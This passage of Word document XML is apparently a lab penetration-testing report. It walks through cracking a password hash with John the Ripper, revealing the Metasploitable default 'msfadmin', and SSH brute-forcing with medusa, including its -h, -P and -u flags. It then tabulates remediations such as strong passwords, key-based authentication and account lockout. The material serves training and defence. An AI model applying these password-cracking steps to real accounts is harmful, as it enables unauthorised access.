      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/home/kali/Desktop/Sample_Password_File.txt  hash.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> entails that john the ripper should crack the password by using the parsed password list file on the attacker Desktop which can be found in the home directory of the attacker and then adds the hash.txt file which contains the hashes of the password which ends up successfully cracked by john.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236735F6" w14:textId="77777777" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65CB62AF" w14:textId="7E7EF356" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The image below shows john was able to crack the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249B79F5" w14:textId="77777777" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219FC78D" w14:textId="566C6C78" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="188A0958" wp14:editId="5CC974DF">
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="443289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8939" name="Picture 44328939"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">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7ABBDB2A" w14:textId="7D7D83DE" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="00CD3936" w:rsidP="008C5885">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_7.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DBF408" w14:textId="77777777" w:rsidR="00CD3936" w:rsidRPr="002F3E4E" w:rsidRDefault="00CD3936" w:rsidP="008C5885">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9721E4" w14:textId="23D23C81" w:rsidR="00CD3936" w:rsidRPr="002F3E4E" w:rsidRDefault="00CD3936" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The above image shows that john revealed the password which is (</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FD064" w14:textId="77777777" w:rsidR="00BB23F1" w:rsidRPr="002F3E4E" w:rsidRDefault="00BB23F1" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6775DD30" w14:textId="60DE3979" w:rsidR="00BB23F1" w:rsidRPr="002F3E4E" w:rsidRDefault="00BB23F1" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After a successful attempt using john the ripper, the attacker then proceeded to use another tool called “medusa” which is another password cracking tool for brute forcing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B14E9C" w14:textId="77777777" w:rsidR="00BB23F1" w:rsidRPr="002F3E4E" w:rsidRDefault="00BB23F1" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC4FCA3" w14:textId="27AF39DA" w:rsidR="00BB23F1" w:rsidRPr="002F3E4E" w:rsidRDefault="00BB23F1" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The image below shows the “medusa” tool along with the various flags used to simulate the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A27763" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00BB23F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FC8954" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00BB23F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF13860" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00BB23F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046A7C69" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00BB23F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F08C228" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00BB23F1" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E5E4295" wp14:editId="681C4138">
            <wp:simplePos x="914400" y="914400"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="721735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35133" name="Picture 721735133"/>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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D1DC8" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_8.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3EBDC" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2792B0EC" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The above image shows the various flags used in conjunction with the medusa tool. Amongst them are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64895E6A" w14:textId="24D8E235" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-h: Tells medusa the name of the host or IP address to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B31A2" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-P: Tells medusa to use the stated password text file for cracking the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5E1E9A" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-u:  Tells medusa the name of the user that the attack wants to be performed on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506ED46" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This and many other flags can be used by the attacker to simulate its attack on the host or user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC4F8A" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1033B47F" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF52051" wp14:editId="47FC6C38">
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1823730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30664" name="Picture 1823730664"/>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4EA6068C" w14:textId="3172E593" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_9.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF4EFAE" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6120A486" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11ACD3A8" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B060A21" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6B448D" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4236B0F1" w14:textId="1DCD765A" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The image below shows </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“medusa”</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> was able to crack the password using the parsed password text file and the name of the user as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC5433" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFCE668" w14:textId="5287D8A7" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remediations to take to prevent this attack in future:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10187" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3395"/>
        <w:gridCol w:w="3396"/>
        <w:gridCol w:w="3396"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w14:paraId="2A8C0F4E" w14:textId="77777777" w:rsidTr="00FA6096">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397160B5" w14:textId="0F5CD49D" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D97CA75" w14:textId="6D268B8A" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="533EC803" w14:textId="73A29401" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w14:paraId="2E0B28E4" w14:textId="77777777" w:rsidTr="00FA6096">
        <w:trPr>
          <w:trHeight w:val="685"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A33F29C" w14:textId="3A95F096" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Weak SSH passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15EF2B42" w14:textId="4B9115BA" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Easy brute-force attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="135B3BA0" w14:textId="706709A6" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Enforce strong password policies, key-based auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w14:paraId="3F3576D0" w14:textId="77777777" w:rsidTr="00FA6096">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2C7C68" w14:textId="40C72189" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Outdated SSH Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EAD89DC" w14:textId="4D6802C5" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Potential Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="528E7BF0" w14:textId="30A5568A" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Upgrade to the latest SSH Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w14:paraId="3E9D3687" w14:textId="77777777" w:rsidTr="00FA6096">
        <w:trPr>
          <w:trHeight w:val="685"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="011BCE20" w14:textId="3F566156" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>No account lockout policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22BF5CD2" w14:textId="56AD92D4" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Allows unlimited password attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2258AACD" w14:textId="0820FEA9" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Implement account lockout after failed attempts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w14:paraId="43DDE3BE" w14:textId="77777777" w:rsidTr="00FA6096">
        <w:trPr>
          <w:trHeight w:val="685"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="147E5187" w14:textId="0C2891C1" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">File transfer unrestricted </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D0A64CF" w14:textId="07C67F6D" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
